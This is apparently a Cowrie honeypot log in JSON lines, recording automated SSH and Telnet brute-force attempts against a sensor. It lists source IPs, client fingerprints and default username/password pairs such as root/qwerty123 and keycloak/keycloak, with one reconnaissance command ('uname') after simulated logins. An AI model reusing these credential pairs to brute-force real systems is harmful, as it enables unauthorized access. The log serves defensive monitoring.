{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:35:37.384004Z","src_ip":"212.227.125.160","session":"44500457737b"}
{"eventid":"cowrie.login.failed","username":"jiffyexp-usr","password":"jiffyexp-usr","message":"login attempt [jiffyexp-usr/jiffyexp-usr] failed","sensor":"my-vps","timestamp":"2025-08-26T11:35:37.543369Z","src_ip":"212.227.125.160","session":"44500457737b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:38.608491Z","src_ip":"212.227.125.160","session":"44500457737b"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:41.394404Z","src_ip":"212.227.125.160","session":"95f91b121a2c"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:41.659845Z","src_ip":"212.227.125.160","session":"27bfa04914a4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":36084,"dst_ip":"1.2.3.4","dst_port":22,"session":"0254b4969c0a","protocol":"ssh","message":"New connection: 196.251.86.249:36084 (1.2.3.4:22) [session: 0254b4969c0a]","sensor":"my-vps","timestamp":"2025-08-26T11:35:42.356598Z"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":47646,"dst_ip":"1.2.3.4","dst_port":22,"session":"8334914651f4","protocol":"ssh","message":"New connection: 83.168.105.65:47646 (1.2.3.4:22) [session: 8334914651f4]","sensor":"my-vps","timestamp":"2025-08-26T11:35:42.498997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:42.499674Z","src_ip":"83.168.105.65","session":"8334914651f4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:35:42.535531Z","src_ip":"83.168.105.65","session":"8334914651f4"}
{"eventid":"cowrie.login.failed","username":"www","password":"abc123","message":"login attempt [www/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:35:42.644437Z","src_ip":"83.168.105.65","session":"8334914651f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46268,"dst_ip":"1.2.3.4","dst_port":22,"session":"e73e4f0417e7","protocol":"ssh","message":"New connection: 212.227.125.160:46268 (1.2.3.4:22) [session: e73e4f0417e7]","sensor":"my-vps","timestamp":"2025-08-26T11:35:42.817859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:42.818805Z","src_ip":"212.227.125.160","session":"e73e4f0417e7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:42.841882Z","src_ip":"196.251.86.249","session":"0254b4969c0a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:35:42.842713Z","src_ip":"196.251.86.249","session":"0254b4969c0a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:35:42.869463Z","src_ip":"212.227.125.160","session":"e73e4f0417e7"}
{"eventid":"cowrie.login.failed","username":"yealink","password":"yealink","message":"login attempt [yealink/yealink] failed","sensor":"my-vps","timestamp":"2025-08-26T11:35:43.021594Z","src_ip":"212.227.125.160","session":"e73e4f0417e7"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:43.682090Z","src_ip":"83.168.105.65","session":"8334914651f4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:44.084454Z","src_ip":"212.227.125.160","session":"e73e4f0417e7"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"111111","message":"login attempt [hadoop/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T11:35:44.591761Z","src_ip":"196.251.86.249","session":"0254b4969c0a"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:46.465433Z","src_ip":"196.251.86.249","session":"0254b4969c0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47038,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfcd63075e1d","protocol":"ssh","message":"New connection: 212.227.125.160:47038 (1.2.3.4:22) [session: bfcd63075e1d]","sensor":"my-vps","timestamp":"2025-08-26T11:35:48.579360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:48.635405Z","src_ip":"212.227.125.160","session":"bfcd63075e1d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:35:48.647295Z","src_ip":"212.227.125.160","session":"bfcd63075e1d"}
{"eventid":"cowrie.login.failed","username":"bitrix","password":"bitrix","message":"login attempt [bitrix/bitrix] failed","sensor":"my-vps","timestamp":"2025-08-26T11:35:48.933472Z","src_ip":"212.227.125.160","session":"bfcd63075e1d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:49.985038Z","src_ip":"212.227.125.160","session":"bfcd63075e1d"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:51.782121Z","src_ip":"212.227.125.160","session":"3ded59585406"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47812,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d281c04de97","protocol":"ssh","message":"New connection: 212.227.125.160:47812 (1.2.3.4:22) [session: 7d281c04de97]","sensor":"my-vps","timestamp":"2025-08-26T11:35:54.645958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:54.647266Z","src_ip":"212.227.125.160","session":"7d281c04de97"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:35:54.700158Z","src_ip":"212.227.125.160","session":"7d281c04de97"}
{"eventid":"cowrie.login.failed","username":"keycloak","password":"keycloak","message":"login attempt [keycloak/keycloak] failed","sensor":"my-vps","timestamp":"2025-08-26T11:35:54.860317Z","src_ip":"212.227.125.160","session":"7d281c04de97"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:55.914021Z","src_ip":"212.227.125.160","session":"7d281c04de97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42858,"dst_ip":"1.2.3.4","dst_port":23,"session":"4926228ca077","protocol":"telnet","message":"New connection: 212.227.235.229:42858 (1.2.3.4:23) [session: 4926228ca077]","sensor":"my-vps","timestamp":"2025-08-26T11:35:56.566633Z"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":56438,"dst_ip":"1.2.3.4","dst_port":22,"session":"50e3382f58c0","protocol":"ssh","message":"New connection: 83.168.105.65:56438 (1.2.3.4:22) [session: 50e3382f58c0]","sensor":"my-vps","timestamp":"2025-08-26T11:35:57.773244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:35:57.774272Z","src_ip":"83.168.105.65","session":"50e3382f58c0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:35:57.813738Z","src_ip":"83.168.105.65","session":"50e3382f58c0"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:35:57.935612Z","src_ip":"83.168.105.65","session":"50e3382f58c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:35:58.079563Z","src_ip":"83.168.105.65","session":"50e3382f58c0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:35:58.080336Z","src_ip":"83.168.105.65","session":"50e3382f58c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:58.120625Z","src_ip":"83.168.105.65","session":"50e3382f58c0"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:35:58.121942Z","src_ip":"83.168.105.65","session":"50e3382f58c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48578,"dst_ip":"1.2.3.4","dst_port":22,"session":"716364889703","protocol":"ssh","message":"New connection: 212.227.125.160:48578 (1.2.3.4:22) [session: 716364889703]","sensor":"my-vps","timestamp":"2025-08-26T11:36:00.459191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:00.538901Z","src_ip":"212.227.125.160","session":"716364889703"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:36:00.539845Z","src_ip":"212.227.125.160","session":"716364889703"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:36:00.793705Z","src_ip":"212.227.125.160","session":"716364889703"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:36:00.992450Z","src_ip":"212.227.125.160","session":"716364889703"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:36:00.993131Z","src_ip":"212.227.125.160","session":"716364889703"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:01.053237Z","src_ip":"212.227.125.160","session":"716364889703"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:01.054505Z","src_ip":"212.227.125.160","session":"716364889703"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49346,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a28f836d4a5","protocol":"ssh","message":"New connection: 212.227.125.160:49346 (1.2.3.4:22) [session: 6a28f836d4a5]","sensor":"my-vps","timestamp":"2025-08-26T11:36:11.596634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:11.640561Z","src_ip":"212.227.125.160","session":"6a28f836d4a5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:36:11.698782Z","src_ip":"212.227.125.160","session":"6a28f836d4a5"}
{"eventid":"cowrie.login.failed","username":"lsfadmin","password":"lsfadmin","message":"login attempt [lsfadmin/lsfadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:36:11.854755Z","src_ip":"212.227.125.160","session":"6a28f836d4a5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:13.156658Z","src_ip":"212.227.125.160","session":"6a28f836d4a5"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":52152,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1159d38a13d","protocol":"ssh","message":"New connection: 83.168.105.65:52152 (1.2.3.4:22) [session: f1159d38a13d]","sensor":"my-vps","timestamp":"2025-08-26T11:36:13.362605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:13.363389Z","src_ip":"83.168.105.65","session":"f1159d38a13d"}
